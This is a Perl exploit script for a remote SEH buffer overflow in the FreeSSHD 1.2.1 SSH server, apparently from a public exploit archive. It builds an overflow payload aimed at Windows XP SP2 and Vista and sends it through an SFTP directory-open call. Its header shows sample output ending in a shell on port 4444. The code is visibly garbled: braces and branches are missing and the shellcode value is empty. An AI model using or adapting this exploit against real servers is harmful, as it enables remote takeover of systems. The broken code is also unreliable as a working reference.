# FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow http://freeddsshd.com/ #
# Exploit based on securfrog Poc http://www.milw0rm.com/exploits/5709 #
# #
# Coded by Matteo Memelli aka ryujin #
# `Spaghetti & PwnSauce` #
# >> http://www.be4mind.com http://www.gray-world.net << #
# #
# Tested on Windows XPSp2 EN / Windows Vista Ultimate EN #
# Offset for SEH overwrite is 3 Bytes greater in Windows Vista #
# Reliable Exploitation needs SSC :) #
# #
# `I Miss Python but...I Gotta learn some perl too ;)` #
# `Cheers to #offsec friends and to my bro s4tan` #
# #
# bt POCS # ./freeSSHD_exploit.pl 22 pwnme pwnme 2 #
# [+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow #
# [+] Coded by Matteo Memelli aka ryujin #
# [+] SSC: Stack Spring Cleaning... >> rm thisJunk << #
# [+] Exploiting FreSSHDService... #
# [+] Sending Payload... #
# [*] Done! CTRL-C and check your shell on port 4444 #
# #
# bt POCS # nc 4444 #
# Microsoft Windows [Version 6.0.6000] #
# Copyright (c) 2006 Microsoft Corporation. All rights reserved. #
# #
# C:\Users\ryujin\Desktop> #
# #
use strict;
use Net::SSH2;
my $numArgs = $#ARGV + 1;
if ($numArgs != 5) {
print "Usage : ./freeSSHD_exploit.pl HOST PORT USER PASS TARGET\n";
print "TARGET: 1 -> XPSP2\n";
print "TARGET: 2 -> VISTA\n";
# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# ExitFunc=SEH
my $shellcode =
my $nops = "\x90"x64;
my $offset1xp = "\x41"x242;
my $offset1vi = "\x41"x226;
my $offset2xp = "\x41"x24;
my $offset2vi = "\x41"x43;
my $ppr = "\xde\x13\x40";
my $jmpsxp = "\xeb\xe1\x90\x90";
my $jmpsvi = "\xeb\xce\x90\x90";
my $jmpn = "\xe9\x23\xfc\xff\xff";
my $ip = $ARGV[0];
my $port = int($ARGV[1]);
my $user = $ARGV[2];
my $pass = $ARGV[3];
my $payload = '';
if ($ARGV[4] == '1')
$payload = $nops.$shellcode.$offset1xp.$jmpn.$offset2xp.$jmpsxp.$ppr;
elsif ($ARGV[4] == '2')
$payload = $nops.$shellcode.$offset1vi.$jmpn.$offset2vi.$jmpsvi.$ppr;
print "[-] TARGET ERROR!\n";
print "[+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow\n";
print "[+] Coded by Matteo Memelli aka ryujin\n";
print "[+] SSC: Stack Spring Cleaning... >> rm thisJunk <<\n";
# If you start the exploit before any other connection, everything is fine
# otherwise exploit could become less reliable.
# So let's rm some junk before exploiting our app...
for (my $count = 30; $count >= 1; $count--) {
my $ssh2 = Net::SSH2->new();
$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
my $ssh2 = Net::SSH2->new();
$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
print "[+] Exploiting FreSSHDService...\n";
print "[+] Sending Payload...\n";
print "[*] Done! CTRL-C and check your shell on port 4444\n";
my $sftp = $ssh2->sftp();
my $bad = $sftp->opendir($payload);